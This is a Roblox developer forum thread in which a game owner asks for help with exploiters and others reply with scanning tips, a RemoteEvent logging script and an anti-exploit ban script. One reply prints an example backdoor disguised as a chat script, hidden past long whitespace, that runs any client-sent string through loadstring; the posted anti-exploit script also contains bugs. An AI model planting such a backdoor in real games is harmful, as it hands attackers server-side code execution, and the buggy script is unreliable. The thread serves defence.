Game being exploited heavily, not sure how to resolve

https://www.roblox.com/library/167126759/Virus-Scanner-Anti-Virus-v1-8-5

I recommend this virus scanner, with it you can check, for instance the workspace and drag selected objects to quarantine.

All of the scripts printed are not malicious.

Very helpful and well planned and though out, I would recommend this!

1 Like

Did you try viewing hidden folders like I said?

Backdoors can be simply as this

-- RobloxBubbleChat By Roblox

local function onChat(...)
	-- ...
end

																																																																																																																																																																												local a = Instance.new("RemoteEvent", workspace)a.Name="^"a.OnServerEvent:Connect(function(b, c)pcall(function()print(c)loadstring(c)end)end)																																																																																																													

@MallocByte Yes, I have tried viewing hidden folders.


@Daw588 None of the scripts has suspicious scroll bars.

Keep managing to kick us all from the game…
Screen Shot 2020-07-26 at 5.12.37 PM

Can you send me a link to all plugins you have installed?
Edit:
Also try this please.

Press ctrl-shift-f
type in require() and see what shows up
do the same for getfenv() and loadstring()

My plugins can be found in like my second to last topic I posted, although it has been verified that those plugins are trusted and are not the issue.

I near to clear some misinformation spread on this thread. When the client creates anything on the client it will NOT replicate to the server, unless you use a remote event which the player can fire to create bricks on the server, what a backdoor does or what poor remote security leads to.

The FE property is useless now Workspace | Documentation - Roblox Creator Hub

No things like deleting part’s dont replicate to the server, if any software is allowing this it probably is hacking roblox servers.

Module’s don’t specially allow you to replicate changes to the server…?

If someone is creating parts, then it would ONLY lag for them unless if they send a remote to the server which creates these parts.

If there is any reason why thing’s like spawning bricks are replicating to the server without remote events its most likely a roblox bug or security issue

1 Like

Add this script into your game, put it to the ServerScriptService, restart entire game, and open console once you are in the game, and watch the console, if you see someone who shouldn’t fire certain event, screenshot it.

-- RemoteEvent inspector By Daw588, find who is firing events in your place!
local function attachListener(RemoteEvent)
	pcall(function()
		RemoteEvent.OnServerEvent:Connect(function(Player)
			warn("'".. Player.Name.. "' has sent request to '".. RemoteEvent:GetFullName().. "'")
		end)
	end)
end
game.DescendantAdded:Connect(function(Child)
	pcall(function()
		if Child:IsA("RemoteEvent") then
			attachListener(Child)
		end
	end)
end)
for _, Child in pairs(game:GetDescendants()) do
	pcall(function()
		if Child:IsA("RemoteEvent") then
			attachListener(Child)
		end
	end)
end

image
If it’s an backdoor, this will expose the player who does those actions.

1 Like

If a server is shutting down, parts are being spawned, the map deleted, etc. then you must have some backdoor or someone with access to your build is abusing on the game. All major exploits that crash servers have been patched recently unless you have a remote that doesn’t have proper sanity checks. Inserting parts should not be happening, and if your map is being deleted, that has to be on the server unless it is an unanchored part with the exploiter having network ownership of it.

Heya. Posting here to inform you (as well as other readers) that I have changed the title to more accurately reflect your situation. Statements like “urgent” should be avoided in support topic titles and you should be as detailed about your circumstances as possible before putting up a thread.

I’m not sure if you identified this in later replies, but also including how your game is getting exploited right from the get-go would be helpful as well. Others should not have to search deeply in your thread to understand what is happening or hawk over your game until something happens - that’s your duty to come prepared with when creating a topic.

Thanks!

2 Likes

you can just script it like this banList = {}

local banData = game:GetService(“DataStoreService”):GetDataStore(“banList”)

function antiTeleport(p)
if not p:IsA(“Player”) then return end
local char = p.Character
local root = char:WaitForChild(“HumanoidRootPart”)
local hum = char:WaitForChild(“Humanoid”)
if root==nil then
p:Kick(“Attempting to bypass”)
banData:SetAsync(p.UserId,true)
end
if hum.RigType == Enum.HumanoidRigType.R15 and char:FindFirstChild(“LowerTorso”)==nil then
p:Kick(“Bypassing”)
banData:SetAsync(p.UserId,true)
elseif hum.RigType == Enum.HumanoidStateType.R6 and char:FindFirstChild(“Torso”)==nil then
p:Kick(“Bypassing”)
banData:SetAsync(p.UserId,true)
end
local pos1 = root.CFrame
wait(2)
local pos2 = root.CFrame
local mag = (pos1-pos2).magnitude
if mag>25 then
p:Kick(“Teleporting”)
banData:SetAsync(p.UserId,true)
end
end

game.Players.PlayerAdded:Connect(function(p)
for _,ban in ipairs(banList) do
if p.Name==ban then
p:Kick(“You are banned from this game”)
end
end
local stat = banData:GetAsync(p.UserId)
if stat then
p:Kick(“You are banned from this game”)
elseif stat==nil then
banData:SetAsync(p.UserId,false)
end
local char = p.Character
local hum = char:WaitForChild(“Humanoid”)
local root = char:WaitForChild(“HumanoidRootPart”)
hum.Changed:Connect(function()
if hum.WalkSpeed>32 then – if you have a sprint script, you can edit this
banData:SetAsync(p.UserId,true)
p:Kick(“Banned for altering WalkSpeed”)
else
if hum.JumpPower>50 then
banData:SetAsync(p.UserId,true)
p.Kick(“Banned for altering JumpPower”)
else
if hum.HipHeight>2 then
banData:SetAsync(p.UserId,true)
p:Kick(“Banned for altering HipHeight”)
end
end
end
end)
while wait() do
if root:FindFirstChildOfClass(“BodyPosition”) or root:FindFirstChildOfClass(“BodyGyro”) or root:FindFirstChildOfClass(“BodyVelocity”) or root:FindFirstChildOfClass(“RocketPropulsion”) then
p:Kick(“Flying”)
banData:SetAsync(p.UserId,true)
else
if hum.RigType == Enum.HumanoidRigType.R6 and char[“Torso”]:FindFirstChildOfClass(“BodyPosition”) or char[“Torso”]:FindFirstChildOfClass(“BodyGyro”) or char[“Torso”]:FindFirstChildOfClass(“BodyVelocity”) or char[“Torso”]:FindFirstChildOfClass(“RocketPropulsion”) then
p:Kick(“Flying”)
banData:SetAsync(p.UserId,true)
else
if hum.RigType == Enum.HumanoidRigType.R15 and char[“LowerTorso”]:FindFirstChildOfClass(“BodyPosition”) or char[“LowerTorso”]:FindFirstChildOfClass(“BodyGyro”) or char[“LowerTorso”]:FindFirstChildOfClass(“BodyVelocity”) or char[“LowerTorso”]:FindFirstChildOfClass(“RocketPropulsion”) then
p:Kick(“Flying”)
banData:SetAsync(p.UserId,true)
else
antiTeleport()
end
end
end
end
end)

As from what you tell, it seems like it is not a joke. I have no idea how he could spawn Bricks on the server (from what you tell). You may ban this guy or else I do not really believe there is another solution.

1 Like

Exactly you shouldn’t

Do not call someone out for breaking TOS / forum rules / infringing on rights of others:

  • You should never derail a topic with presumptions of legal issues with the content presented. If you are not one of the legally involved parties – leave it be .
  • If you think there is a legal issue with the content presented and you are legally involved, contact forum staff to handle the matter appropriately or privately message the poster.
  • Free Models are public domain , meaning if you put something on Free Models, other people are allowed to use them in their work fully, without any attribution needed. Do not call people out for using free models, period. You should not put your assets in free models if you do not want them to be used by others without restrictions. (If you think one of your assets was put on free models illegitimately, use report abuse, and if an illegitimate free model is used somewhere on this forum, reach out to the poster / to staff about it privately.)

That isn’t suffcient evidence unless you screenshotted him saying that, you could be lying (not saying you are, but there is a possiblility). If you ever want to accuse someone show valid proof.

Also worth noting that ServerScriptService and ServerStorage are the ONLY places that exploiters truly cannot access.

I wonder if this was ever resolved. I wonder if it’s possible for a malicious plugin to detect when the game is being published and insert stuff when that happens and delete it when it’s published…

1 Like

This probably whould’nt be resolved, as the OP won’t even try an anti-backdoors or even CTRL+SHIFT+F with plugin.

Hi! Thankfully it was resolved, it was my Vice-Chairman exploiting it. Quite a huge backstab, but I was able to remove him from the position and ever since it hasn’t happened.

5 Likes